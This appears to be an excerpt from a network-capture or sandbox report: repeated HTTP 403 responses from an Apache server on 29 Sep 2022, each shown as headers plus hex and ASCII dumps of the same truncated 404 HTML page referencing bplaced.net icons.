                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:59.268287897 CEST14605INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:59 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=113
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:00.086096048 CEST14613INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:00 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=68
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:51:01.190547943 CEST14621INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:01 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=119
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:02.171580076 CEST14628INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:02 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=107
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:03.298682928 CEST14636INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:03 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=120
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
